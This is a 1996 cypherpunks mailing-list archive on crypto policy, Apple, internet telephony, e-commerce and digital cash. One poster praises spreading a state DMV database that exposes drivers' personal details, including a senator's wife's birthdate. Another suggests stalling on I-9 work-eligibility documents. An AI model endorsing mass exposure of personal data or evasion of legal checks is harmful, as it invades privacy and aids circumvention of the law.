>of part of the problem...
>
>
>so whats it gonna be.

I don't buy this notion that I have to choose to be part of the problem or
part of the solution. Nothing Apple can do really matters at this point, as
they've lost the leadership role they once had and are increasingly
"marginalized."

Crypto tools are platform-independent, ideally. Unless crypto tools and
algorithms are "built in" in some very usable way to Copland, say, there
just is no role for Apple. Sure, you lean on Steve Dorner at Qualcomm to
get crypto into Eudora in a more central way, and work with Netscape in
some way, but not much else is to be done.

(And Apple dropped the ball a couple of years ago with the "digital
signature" stuff they announced...I forget the name, but it was some kind
of certificate-based system, probably called something typically Apple-ish
like "OpenCertification" or somesuch. I think it was introduced in 1994 or
so, about the time the 660av and 840av were rolled out. Nothing more has
ever come of it, not too surprisingly.)

And speaking of the av-series machines, and the later PPC machines (of
course), Apple blew it by not developing this as an "Internet phone" sort
of thing. Here they have had av-compatible machines (speakers, microphones,
DSP functionality) for a few years, and yet Microsoft and Intel are
grabbing the headlines with "Internet phone" systems! Jeesh.

(This is not something that talking to the bottom-level troops at a
"crypto" meeting can do, this indicates the complete lack of vision at
higher levels.)

Apple consistently blows its lead, and is now becoming irrelevant. (I don't
plan to switch, so long as my Web-centric apps continue to run and updates
are provided. And I have too many thousands of dollars tied up in Mac
hardware, including the usuals several gigs of disk, CD-R, laser printer,
Powerbooks, etc. So, it'll be several years before I have to switch.

But that sure doesn't mean I have to be a cheerleader for a probably doomed
system. I first bought Apple stock the day after the Mac was unveiled, on
January 25th, 1984, and added to my holdings over the years. I finally
dumped 90% of my shares last fall, for $45. And I'm glad I did.

There is nothing Apple people can do to "help crypto" at this time. And the
only thing they can do to help Apple survive is to do just that, help it
survive. As for what that might be, at this late date, I'm fresh out of
ideas.

You may think this is Apple-bashing. I avoid bashing Apple in public, as
the issues and themes are well-known to all. But you have framed your note
to me as a call for me to "put up or shut up," implying I have some duty to
help Apple and the Macintosh succeed. I do not.

I am available as a consultant, of course. I doubt Apple needs more more
consultant advising it  on corporate strategies, but this option is open to
you.

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Aug 1996 17:02:03 +0800
To: Bill Stewart <alano@teleport.com>
Subject: Re: More to be paranoid about...
Message-ID: <199608060636.XAA29816@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:50 PM 8/4/96 -0700, Bill Stewart wrote:
>At 10:14 PM 8/3/96 -0700, you wrote:
>>Take a look at:
>>     http://www.spiritone.com/cgi-bin/plates
>>Feed it an Oregon licence plate number and it will feed you back all sorts
>>of info about the person/victim.
>
>It's interesting to know that Senator Hatfield's wife's birthday
>is 1/17/29, and that the title to the car is held with a 
>security interest by the US SENATE EMPLOYEES FEDERAL CREDIT,
>and that (at least) Social Security Numbers weren't listed
>for the plates I checked.  Also that, unlike many states,
>the Governor doesn't have License Plate #1.

It turns out that I am indirectly (two steps removed) responsible for this 
information being publicized on the 'net.  I bought a copy of a CDROM that 
included this data (from a person who bought this data from the State of 
Oregon on magtape), and a friend of mine got a copy from me and made a copy 
for his friend, who decided to put it on the web as an accessible item.

In any case, contrary to Alan Olsen's implication, I think that this kind of 
thing is a step forward for freedom.  Government agencies already have 
access to this kind of information whenever they want; it's only the 
individuals who don't.  Indeed (as my friend pointed out, correctly) this 
information is only considered valuable because not everyone has it.  Making 
this information available puts government-types under the same "gun" as the 
rest of us already were.  

It is now being seen that driver's licenses, while ostensibly merely being a 
certification that we know how to drive, are most useful to government as a 
way to "legitimately" collect information on us, including our address and 
age.  Since the function of credentialing is being implemented using 
encryption in ways to protect privacy, I suggest that we should push the 
government in that direction.  





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Aug 1996 02:52:49 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: Digital Telephony costs $2
Message-ID: <199608060636.XAA29824@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:50 PM 8/4/96 -0700, Bill Stewart wrote:

>One advantage of higher-speed modems is that you can get away with
>16kbps ADPCM coding, which is dirt-simple computationally;
>your 386 probably has enough horsepower to do it, though a PC's
>interrupt structure may make it tough to shove all the data in and
>out in real time.  You still need a sound card that'll do the
>A/D and D/A conversion simultaneously if you want full-duplex;
>that wasn't part of the original market vision of Soundblaster,
>so vanilla sound cards don't all do it.

What is unclear, however, is WHY they "had to" build a card that couldn't do 
full-duplex.  I mean, would there have been a problem implementing that?  Or 
was this just another one of those stupid design decisions which could have 
been easily fixed if it had been realized in time?


> It also has the advantage
>that the data is being moved through your CPU, so encryption is
>an easy add-on, rather than having one combined modem/voiceblaster
>card which doesn't have any hooks for crypto or other processing.

Well, I assume that if implemented as a new type of modem card, the 
processor can be used to do the data transfer.


>
>>Sure,  it may not be necessary to compress voice audio all the way down to 
>>2400 bps, since the current modem standards allow 28.8kbps and beyond, but I 
>>suggest that decreasing net traffic by a factor of 12 (28.8k to 2.4k) is a 
>>desirable goal.  
>
>One problem is that tighter compression methods are far more sensitive
>to network latency than crude ones, and need to process more milliseconds
>of speech before putting out a packet on the net (e.g. a 64-byte tinygram
>is 200ms of speech at 2400bps, vs. 32ms at 16kbps.)  For modem-to-modem
>communications, this is no problem; for Internet random delays it is.

I see what you're saying; this makes sense.  Maybe what the industry is 
going to have to do is to start out at 16kpbs, reserving full 2400 bps 
compression for a (near?) future time when network latencies are low and 
predictable.


>Also, another big difficulty with full-duplex transmission is that you
>need echo-cancelling, especially with high-latency circuits.
>Half-duplex is annoying, but it doesn't echo, and it's more tolerant
>of delay because you're not expecting it to have natural timing...

Fortunately, this is the kind of thing that DSP's are good at...


>>The reason I think a system I've described has a future is that modem 
>>manufacturers have a PROBLEM.  Their problem is that they've pretty much run 
>>out of room to improve the bit-pushing through a 3 KHz bandwidth.  
>
>Given that the "3KHz" is almost universally transmitted over 64kbps
>digital channels, there's really no point in pushing past 33.6 with
>analog-based coding; better to just do ISDN. 

The local phonecos still want to overcharge for ISDN, however.  Major 
bigtime problem.  ISDN looked great back in about 1980 when the fastest 
common modem was 300 baud, but it's lost much of its lustre competing 
against 33.6 kbps.  Maybe if ISDN were available at a premium of $5 per 
month or so...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 7 Aug 1996 05:18:26 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Internet Economics
Message-ID: <199608060643.XAA00161@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 8/5/96 -0400, Duncan Frissell wrote:
>At 02:22 PM 8/5/96 -0800, jim bell wrote:
>>The current question is how to motivate individuals and companies to invest 
>>in improvements to the Internet that will benefit everyone. However, I don't 
>>think that will be the limiting factor that it may currently appear to be.  
>>Due to the nature of the Internet, there is nothing to prevent a company 
>>(such as AOL, Compuserve, or other) from building a shadow version of the 
>>Internet, through which all of its customer's traffic will pass until it 
>>emerges local to its destination.  
>
>Note that this is the business model for @HOME which will be handling the
>heavy lifting for various Internet Over Cable systems around the country.

They'll need it.  However, we can assume that POLDCs (Plain Old 
Long-Distance Companies) will fight back.  The easiest thing for them to do 
would be to offer a single-payment-per-year, unlimited-use LD telephone 
service for maybe $10 per month or so.  If, as various people have 
suggested, half the cost for LD is billing and customer service, they'll cut 
their costs by a factor of two and still make money.  This would take the 
wind out of the sails of domestic LD; it is unclear whether foreign LD would 
follow suit.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 6 Aug 1996 14:38:46 +0800
To: cypherpunks@toad.com
Subject: Re: Integrating PGP 3.0 Library with INN
In-Reply-To: <199608052017.PAA09340@homeport.org>
Message-ID: <X5Z8RD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:

> Igor Chudov wrote:
>
> | Has anyone thought of integrating PGP 3.0 library with INN?
> |
> | I was thinking along the lines of having PGPMoose support built
> | right into INN: if an arriving article is posted to a moderated
> | newsgroup for which a PGP key is available in the INN's keyring,
> | INN verifies existence and correctness of a PGP signature.
>
>
> | If moderators choose short enough keys (512 bits for example), this
> | verification will not take any significant amount of CPU time.
>
> Its my experience that at full feed sites, there isn't enough cpu to
> do this.  A p-90 can get ovewhelmed pretty easily trying to keep up
> with the load.  Trying to look into the body of an article means at
> least a few hundred more ops per article.  You could do this on a leaf
> node.  However, you cut the reliability of the system by adding things
> to go wrong.  Better to have a scanner that checks specific moderated
> groups after INN has deposited the articles.

It's wasteful to run this checking at every Usenet node.

It would be more efficient to run PHPMoose checking at a few trusted sites
and have them issue NoCeMs for articles that fail the check.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 6 Aug 1996 17:18:51 +0800
To: Vinnie Moscaritolo <net-thinkers@thumper.vmeng.com
Subject: Re: Credit Cards over the internet
Message-ID: <2.2.32.19960806064420.00af96e8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 8/5/96 -0800, Vinnie Moscaritolo wrote:
>Just read a forwarded message from a merchant who indicated that:

{credit card hastles deleted]

I have been having some similar hastles setting up a site for credit card
usage.  It seems that the credit card companies are confused between
protecting cards over the net and validating credit card information.  (Two
entirly different problems.)  The broker we are going through seems to have
gotten a few clues, but it is taking ALOT of explaining.  (The site will be
running Stronghold when we are able to process credit cards. We are
currently running Apache 1.1.)  Actually I am having a harder time getting
through to the sysadmin at the host site why we need a commerce server than
I am with the credit card company...

It sounds like the scare stories on the news have taken their toll.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 6 Aug 1996 13:56:36 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Credit Cards over the internet
In-Reply-To: <v0300780aae2c29df08c4@[204.179.131.29]>
Message-ID: <Pine.SUN.3.91.960805234211.753E-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


[set discussion is available on set-discuss@commerce.net . Majordomo stuff]

This would seem to be a new policy; previously I'd heard that mastercard 
and visa were going to be encouraging the use of SET quite strongly, but 
since SET isn't going to be available until at least Q1 97, it would be 
silly to stop all activity now.

SET is massively over-engineered and is one of most obnoxious crypto 
protocols you'll find, but it does have some cute features (merchant 
never learns card number, etc).

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 6 Aug 1996 15:48:18 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: SSNs (was Re: Internal Passports)
In-Reply-To: <2.2.32.19960806010151.008f8f48@panix.com>
Message-ID: <Pine.SUN.3.91.960805234946.753F-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


one silly thought: lots of people use cypherpunks as the username and 
password for all those websites that want an id. What about a cypherpunks 
3-2-4 number for those cases where an SSN isn't appropriate. Anyone know 
what J. Edgar Hoover's SSN was?



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 6 Aug 1996 10:38:03 +0800
To: "David M. Rose" <drose@AZStarNet.com>
Subject: Re: Public report of the EU crack.
In-Reply-To: <199608052120.OAA06066@web.azstarnet.com>
Message-ID: <Pine.BSF.3.91.960805235759.10764B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



No, no, Dave, you've missed the point. Phill-grams are really stego. Send 
him an email to get the secret decoder ring. Purple ones work best.



On Mon, 5 Aug 1996, David M. Rose wrote:

> Hallam-Baker wrote:
> 
> >I consider the political dimension of this affair to 
> >be more significant that the technical. This brings the
> >US and the French into the same category of anti-crypto
> >government with a habit of poking its nose into other
> >people business and getting caught.
> >
> >		Phill
> 
> Say what?  John Young I can understand; this blather?
> 
> Att: "Doc" Baker/Mr. Hyde, err, Hallam: any rudimentary text on
> diction/grammer/syntax might be helpful to you.
> 
> Sheesh!  At least Sternlight seemed to be acquainted with the English language.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Wed, 7 Aug 1996 02:45:31 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <2.2.32.19960806044723.01073e4c@vertexgroup.com>
Message-ID: <v03007801ae2c9ebff6b6@[207.67.250.128]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:47 PM -0700 8/5/96, John F. Fricker wrote:
>Hmmm. Actually a long time ago I lost my job with Greenpeace out of refusal
>to sign an I-9 which was in '86 the Department of Justice's form to exhibit
>eligibility to work in the US. The form required that I present two pieces
>of photo identification or a driver's license to be authenticated by my
>employer. Maybe it's a CA state law that adds an additional skin tone
>criterium to for the filing of an I-9.
>
I have found that promising to provide the necessary docs, and then failing to do so, is the least confrontational and most effective way around this.

"Delay is the deadliest form of denial"


-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 6 Aug 1996 17:21:33 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: Stealth cookies
In-Reply-To: <2.2.32.19960806003319.00a5a274@vertexgroup.com>
Message-ID: <3206EFF8.6238@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John F. Fricker wrote:
> Solution?
> 
> 1) Don't put your name in the netscape configuration (d'oh)

  No, no, no.  Netscape navigator does not reveal your name or
put it into cookies.  The only way to get your name or other
personal information about you into a cookie is for you to type
it into a web site, and have that site send you back a cookie.

  The only time we reveal your name is in e-mail headers, and
when doing anonymous FTP when you have manually disabled the default
of sending 'mozilla@' as the anon ftp password.

	--Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Wed, 7 Aug 1996 18:20:58 +0800
To: TrustBuckFella <TrustBuckFella@nowhere.com>
Subject: Re: TrustBucks
In-Reply-To: <64gf4trmj9@nowhere.com>
Message-ID: <v03007800ae2c81fb3823@[166.84.220.80]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:11 -0500 8/2/96, TrustBuckFella wrote:


>Examples: Say Alice wants to pay Bob in TrustBucks, and Bob agreed to
>accept payment in this form. Alice has several options for paying him.
>
>*       Alice already has some TrustBucks( Bob ).
>
>                Alice pays Bob.
>
>*       The amount is small enough that Bob trusts Alice directly.
>
>                Alice and Bob swap TrustBucks( Alice ) for TrustBucks( Bob )
>                Alice pays Bob.
>
>        I know this looks like an extra piece of complexity, but it's
>        really not. By insisting that only TrustBucks( Bob ) are payment
>        to Bob, we insure that Bob can't manipulate what currency he
>        will accept to his advantage, which would otherwise be a
>        problem. For instance, Bob cannot refuse to make good on his
>        debts while accepting other people's money.

I fail to see why/how the initial swap of  TrustBucks(Alice) for
TrustBucks(Bob) followed by Alice returning the TrustBucks(Bob) [as
supposed payment] differs from her just paying with the TrustBucks(Alice)
in the first place [ie: He is willing to accept the TrustBucks(Alice) as
payment for the TrustBucks(Bob) that she will use to pay off her debt]. The
net result is the same - Bob has the same amount of TrustBucks(Bob) in
circulation and has an amount of TrustBucks(Alice) equal to Alice's payment
[the back and forth of the TrustBucks(Bob) is just playing "Right
Pocket/Left Pocket"].






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 7 Aug 1996 02:44:55 +0800
To: Robert Hettinga <cypherpunks@toad.com
Subject: Re: e$: Watching the MacRubble Bounce
Message-ID: <v02120d46ae2c9d988525@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 0:20 8/6/96, Robert Hettinga wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>e$: Watching the MacRubble Bounce

Robert, you *really* need to cut back on that Ritalin. No, not just `one
more'. Put it *away*. Now!

;-)




-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 6 Aug 1996 17:32:08 +0800
To: cypherpunks@toad.com
Subject: Looking for CJ's or State Dept. correspondence re "public domain"
Message-ID: <199608060718.AAA11804@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


We got a brief last week from the State Department in the Bernstein
case (in which we're trying to overturn the crypto export controls
on First Amendment grounds).  They state:

	"In fact, the State Department does not seek to control the
various means by which information is placed in the public domain.
Lowell Decl, para. 22.  The Department does not review scientific
information to determine whether it may be offered for sale at
newsstand and bookstores, through subscriptions, second-class mail, or
made available at libraries, or distributed at a conference or seminar
in the United States.  Id.

	"These clear examples are included in the ITAR to enable
	individuals to determine for themselves whether particular
	information is subject to regulation as technical data.
	Indeed, individuals rarely -- if ever -- seek a determinatino
	from the Department as to whether information is in the public
	domain, and the regularions are not applied to establish a
	prepublication review requirement for the general publication
	of scientific information in the United States."

I am wondering if anyone else has ever sent in a CJ request that
sought to determine whether the item in question was considered
"public domain" by the State Department.  Several CJ's of this type
can be found near the bottom of my crypto export web page, at
ftp://ftp.cygnus.com/pub/export/export.html.

Has anyone else had interactions with the State Department about
the "public domain" status of anything?  Please let me know.
--
John Gilmore                                    gnu@toad.com  --  gnu@eff.org
				RESTRICTED
    Notice. - This document contains information affecting the national
    defense of the United States within the meaning of the Espionage Act
    (U.S.C. 50: 31, 32).  The transmission of this document or the
    revelation of its contents in any manner to any unauthorized person
    is prohibited.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Aug 1996 15:10:31 +0800
To: cypherpunks@toad.com
Subject: e$: Watching the MacRubble Bounce
Message-ID: <v03007800ae2c742ab98e@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

e$: Watching the MacRubble Bounce

Stiffing, Stealth Conferences,
Pieces of the True Cross, Stiffies,
Grenades and Magic Feathers

Robert Hettinga
8/5/96

The principal waste of my time and attention, for the last six weeks or so,
has been my negotiations (or lack thereof) with an (as yet ;-)) unnamed
cypherpunk (and company) about whether they're going to stiff (or not) Peter
Cassidy, me, and two (as yet) unnamed other people, on the final payment
(a moderately signigicant chunk of change) for some consulting work we
did for them earlier this year. We accuse them of shooting the messenger,
because their idea won't work. More to the point, they couldn't make it work
even if a market was there. Which it isn't. For them, anyway. They accuse us
of gross incompetence. Interesting, because we punchlisted the entire
contract (and voluminous addenda) before we shipped the report, have logs of
them downloading *all* the source material and appendices, which we put on
the server for them *long* before we started dunning them for a past due
invoice. Not to mention Peter's written more *published* articles on
topics like this (in places, like, say, the Economist) in the last *year*
than most people *write* about *anything* in their entire lifetimes. And, of
course, they *aren't* going with the business idea they hired us to check
out in the first place. Go figure.

May you live in interesting times, the chinese curse goes, and things have
gotten interesting enough for me lately, thank you very much. I finally
decided to unwrap myself emotionally this week from this particular
"interesting time", "modulo" (to quote the aforementioned unnamed
cypherpunk) real (or imagined :-)) "other" measures our legal help says we
can take, should the inevitable stiffing (or not) occur, and concentrate on
other stuff, "modulo" my time spent in further negotiations about being
stiffed (or not).

Clearly, I've been talking with legal types too much lately. Speaking of
which, someday, I want to write another non-repudiation rant. Code and
Reputation instead of Law and Force, and all that. But not now. We still
might work this out. I hope.


So, in the background of the aforementioned stiffing (or not), Vinnie
Moscaritolo and I have been working on a project, something we've been
talking about since January or so. We wanted to throw a small Macintosh
crypto conference. Tim Dierks, of Consensus (and ex- Apple DTS, where Vinnie
now works), buttonholed Vinnie in a coffee shop a while back, and proposed
that we "stealth" the crypto conference idea into one about digital
commerce. Seeing as how both Vinnie and I gibber about "Digital Commerce is
Financial Cryptography" and all, it was fine by us. Along about June (July?)
or so, Vinnie, ever the mil-spec, surreptitiously obtained the necessary
sack of grenades and started paddling in towards the beach in a rubber raft,
inviting us to mop-up festivities the next morning at dawn. Next thing we
all knew, he had scheduled an Apple conference facility in Cupertino for 2
days, the 5th and 6th of September, a Thursday and Friday, and he may have
even gotten Apple to spring for groceries, though Those with Proper
Budgetary Authority might have gotten hit by a grenade or two, and they (the
groceries) could be MIA. Fortunately, this activity has been entirely a
ground-up exercise on the developers' part, so going dutch for lunch
probably won't scare anyone off, one way or the other. We could probably
hold it in a Chuck-E-Cheese and fill the room, people are that interested in
internet commerce, and crypto, on the Mac. And those little gophers, of
course...

Meanwhile, also in my, heh, copious, free time, (did I tell you I'm also
pitching sponsors for FC97? :-)), I've been working on a Mac-e$ rant with
Vinnie. Collaberation is Hard.  But, it looks like we're just about through.
Real Soon Now. Kind of reminds me of the late-1960's button which said
"Freedom Soon". In the process, said rant has turned into some kind of
Magnum Opus, which makes me nervous, with contributions from a couple of
other people besides Vinnie and myself. And, no, the one you're reading
isn't it. :-). But it's coming. Soon. We hope.


All of which brings up the *real* point of this rant. I mean, who *cares* if
you can do crypto on the Mac or not? Why not stand back and watch the
MacRubble bounce?

My thinking about all of this started because I've been reading Vinnie's
mail over his shoulder. (Yes. I'm shameless. When we're working on stuff
together, we trade our mail about it. As they say in the Mac biz, "Sosumi".)
That is, Vinnie's been out there scaring up speakers for this shindig that
he "borrowed" the grenades for, and, well, in his tree-shaking (God help you
if Vinnie shakes a tree you're in), he invites (if you could call what
Vinnie sent an invitation :-)) Yet *Another* Nameless Cypherpunk (YANC) to
come and give us what we hope would be a Patented Colorful Cypherpunk
crypto-Peptalk, with Vinnie saying to him (YANC), in effect, we need him
(YANC) for a proper Laying-On of Hands, him being a Piece of the True Crypto
Cross, and all.

Of course, Vinnie didn't stand a chance.  If we *could* consider Vinnie for
it, (which we can't, because he's on the selection committee) he might have
earned the coveted 1996 Black Rhino "Mr. Kevlar" award (for courage in the
face of imaginary gunfire) for his efforts. Actually, considering the, heh,
caliber, of last year's winner, it's just as well. A, uh, bang-up job Mr.
Weinstein of Netscape did last year. A hard one to top. And so, the search
continues. Both for this year's "Mr. Kevlar", and, of course, for some other
Piece of the True Cross. Or so we think. I'll get to that in a moment.

What Vinnie got from Yet Another Nameless Cypherpunk, instead of "Yes, I'll
come talk about crypto, the universe, and everything.", was Yet Another
Rendition of the Apple Macintosh Massacree. In six-part ;-) harmony, of
course. And, no, I won't sing it here in its 21-minute (not even 17 for
radio) entirety. However, I should really note here that no matter how
reasoned and cogent YANC's arguments were (and cogent they were, too: upon
reading them, I was halfway to the dumpster with my trusty old PB180,
tears in my eyes, before I came to my senses), in general, one of the *big*
reasons that Vinnie got the $0$AD ($ame Old $ong And Dance) Re the Future of
the Mac as a Viable Platform was probably more because the aforementioned
YANC has eschewed speaking opportunities like this for years anyway, and
Vinnie probably didn't ask him with the Proper Deference Necessary for a
Cypherpunk of That Stature. In fact, I *know* Vinnie didn't, because I read
his mail ;-). However, that, of course, wasn't why YANC gave Vinnie the
aforementioned Massacree in particular.

YANC Massacreed Vinnie because there's a lot of *very* disappointed Mac
users out there, YANC being a prominent example thereof. Love the computer.
Hate the company. Hell hath no fury like a Mac user (not to mention
shareholder) scorned. Heck. I understand *that*. I did the *same* thing just
over a year ago this week. "Platforms are Meat", and all that. For what it's
worth, YANC, I *feel* your pain... :-).


So, I repeat, why *not* stand back and let the MacRubble bounce? No, this is
not a segue for me to stand up in my chair and start singing the Apple
Company Song at the top of my lungs, complete with a QuickDraw-VR DOOM
environment file of One Infinite Loop right up there on the screen for y'all
to marvel at and play with using your very own Newtons, all while I sing 100
Company Song verses with a six-part MIDI chorus of my own voice (Yechhh!).
Nope. Not me. Indeed, I really *do* say, "Why not?". That is, let's look at
what happens if people *don't* develop crypto for the Mac.

The truth is folks, not much.

First of all, we all think it'll be Real Bad News for Apple Real Soon
if real-live strong cryptography isn't shoved as far down as it's possible
to make it go into the Mac's operating system, and right now, dammit. But,
so *what*? The Mac's only, say, 5-7% of the computer market anyway, and the
only possibly new, cool, stuff Apple's involved in, say, OpenDoc/Cyberdog,
has 5%, maybe 10%, of *that*, so, who *cares*? Potential Mac crypto
developers aren't effecting that many people at *all*. They would better
spend their time doing CryptoJava++ or something, because there's *much*
more market penetration *there*. Or, even better, developers should go do
CAPI for Windows. I mean, that's where the *real* money is, right? So
fergadaboudit, go write CAPI-code, I mean, Microsoft Gets The Internet Now,
right? At least there'll be *active* developer support from the MotherShip,
which is better than whatcha get from Apple ferchrissakes <He said, ducking
a mysteriously appearing grenade fusilade from Vinnie's general direction.
Can someone tell me *how* he pulls the pins and throws them all at once
like that?>.

But, as bad as all this is, lack of strong crypto is not nearly that much of
a Mac-Killer, or more to the point, an Apple-Killer. (Love the Machine, Hate
the Company, remember?) What's killing Apple is Apple's sclerotic management
style, and, frankly, too much living high off the hog when margins were fat.
Of course, you never know. Apple could just keep cranking out more and more
machines, at smaller and smaller market shares, ad infinitum. Look at
Porsche (remember Ferry Porsche and what a "disaster" the Volkswagen was?),
or Rolls-Royce. Personally, I would bet that, *if* the Sclerotic Apple
scenario's the case, then jumping with both feet into crypto, and by
extension, financial cryptography and digital commerce, could add a few more
years to Apple's lifetime, but all that money might just go straight to
Apple's waistline *anyway* (at 360lbs soaking wet, *I* should talk...), and
make the end, if it occurs, even that much more grotesque.  ( Yeah, but what
a way to go... Fat Power! ;-))


And, yet, Vinnie's probably going to fill the room on September 5th and 6th.
Hell, he might even fill Chuck-E-Cheese to boot. How come? Because, even
though the market share is small, there's just enough there to support the
small developers who made the Mac a great machine in the first place.


There's a guy in Germany named Ruf. I still think he's around.  Don't ask me
how to say his name. What he does is buy brand-new Porsche 911s, fresh from
the factory, and "blueprints" them. That is, he takes them all apart, down
to the nuts and bolts, and rebuilds them *exactly* to the original design
specifications, remachining metal where necessary. You can imagine that,
with Porsches, there isn't much tolerence for production errors to begin
with, but blueprint them Mr. Ruf does. After he does that, he tweaks them
with all the aftermarket go-fast stuff it's possible to cram onto the little
30-year-old 911 design, some of which he's invented himself. After he's
done, they really do. Go fast, I mean. Usually, his tweaky stuff gets onto
his cars, now sold under the "Ruf" brand name, *waay* before it gets
adopted for production 911s. Mr. Ruf has been doing this for a long time.
His cars go for twice or three times what a production 911 goes for, if you
can imagine paying that much for a *very* fast Porsche 911. He has a very
long waiting list. He sells, say, 10 cars a year. He makes out like a
bandit. And he *loves* his job. There're a whole bunch of guys around
Stuttgart who do this kind of stuff. And *they* love their jobs, too.


That's why Vinnie's going to fill that room in Cupertino. (On the 5th and
6th of September, remember?) First of all, the developers who are left in
the Mac market are there because they love it. The old guys, who, like me,
can't get it up anymore, still hack Macs because they love them. The *new*
developers hack Macs because they can't get leave it *alone* and don't know
from market share anyway. They just love what they're doing.

                               <heh, heh. He said "get it up", Bevis>
           <heh, heh. Yeah. And up there, Butthead, he said "Stiffy">
                                      <No, Bevis. He said "Stiffing">
                               <Oh, yeah. heh, heh. *I* knew that...>

Mssrs. B & B aside, who *knows* what the women Mac developers feel, young or
old, because I'm not one. Or a woman, for that matter. :-). But I *bet*
they're there because *they* love the Mac, too. And, of course, *all* of the
Mac crypto developers also understand the importance of strong cryptography
to digital commerce, so they want to make sure the Mac has it, if they have
to do it themselves, just like Mr. Ruf and his friends blueprint those
brand-new Porsche 911s.


So, finally, I'm going to pull out a dusty old story from the Disney Canon:
Dumbo. <Oh, No! Not the Dumbo story!!! Not Again!!!> Yes. The Dumbo story.
Again.

Remember that Dumbo had a magic feather, given to him by the crows, so that
he could fly, which of course, he didn't really need, because he could fly
already, he just didn't know it. Yes, boys and girls, Vinnie and the Mac
crypto developers wanted, in fear of that 900-foot drop into a teeeny bucket
of water, to have Yet Another Nameless Cypherpunk, A Piece of the True
Crypto Cross, be a magic feather. So they could fly.

Well, it looks like Vinnie, and all those room-filling Chuck-E-Cheese-
Gopher-Banging Mac crypto developers will have to use their ears (or what's
between them, anyway) to fly instead.

Only this time, Dumbo's got a sack of grenades.

A "munition" indeed...


Cheers,
Bob Hettinga

<Heh, heh. Uh, anyone out there got a magic feather, uh, just in case?>
